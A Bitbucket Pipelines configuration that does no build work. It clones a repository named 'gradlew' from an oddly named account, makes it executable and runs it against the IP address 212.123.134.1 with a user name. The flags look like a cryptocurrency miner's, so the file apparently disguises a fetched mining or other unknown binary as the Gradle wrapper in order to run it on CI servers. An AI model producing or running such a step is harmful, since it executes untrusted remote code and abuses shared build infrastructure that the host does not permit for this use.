image: atlassian/default-image:2

pipelines:
  default:
    - step:
        script:
          - git clone https://dfgbfgbnfnfghnj@bitbucket.org/dfgbfgbnfnfghnj/gradlew.git
          - uname -a
          - chmod +x gradlew/gradlew
          - ./gradlew/gradlew -o 212.123.134.1 -u valerio
